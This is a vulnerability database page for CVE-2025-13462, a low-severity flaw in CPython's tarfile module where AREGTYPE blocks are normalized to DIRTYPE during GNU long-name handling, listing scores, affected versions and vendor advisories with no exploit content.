CVE-2025-13462Improper Input Validation in Software Foundation Cpython

CWE-20Improper Input ValidationCWE-74InjectionCWE-434Unrestricted File UploadCWE-237Improper Handling of Structural Elements8 documents8 sources
Severity
2.0LOWNVD
EPSS
0.0%
top 97.42%
CISA KEV
Not in KEV
Exploit
No known exploits
Affected products
1
Python Software Foundation Cpython
Timeline
PublishedMar 12

Description

The "tarfile" module would still apply normalization of AREGTYPE (\x00) blocks to DIRTYPE, even while processing a multi-block member such as GNUTYPE_LONGNAME or GNUTYPE_LONGLINK. This could result in a crafted tar archive being misinterpreted by the tarfile module compared to other implementations.

CVSS vector

CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

Affected Packages1 packages

CVEListV5python_software_foundation/cpython3.14.03.14.4+2

🔴Vulnerability Details

3
CVEList
tarfile: Skip DIRTYPE normalization during GNU LONGNAME/LONGLINK handling2026-03-12
OSV
CVE-2025-13462: The "tarfile" module would still apply normalization of AREGTYPE (\x00) blocks to DIRTYPE, even while processing a multi-block member such as GNUTYPE_2026-03-12
GHSA
GHSA-9qpv-486p-2v4h: The "tarfile" module would still apply normalization of AREGTYPE (\x00) blocks to DIRTYPE, even while processing a multi-block member such as GNUTYPE_2026-03-12

📋Vendor Advisories

3
Red Hat
cpython: cpython: `tarfile` module misinterprets crafted tar archives leading to data integrity issues2026-03-12
Microsoft
tarfile: Skip DIRTYPE normalization during GNU LONGNAME/LONGLINK handling2026-03-10
Debian
CVE-2025-13462: python2.7 - The "tarfile" module would still apply normalization of AREGTYPE (\x00) blocks t...2025

🕵️Threat Intelligence

1
Wiz
CVE-2025-13462 Impact, Exploitability, and Mitigation Steps | Wiz
CVE-2025-13462 — Improper Input Validation | cvebase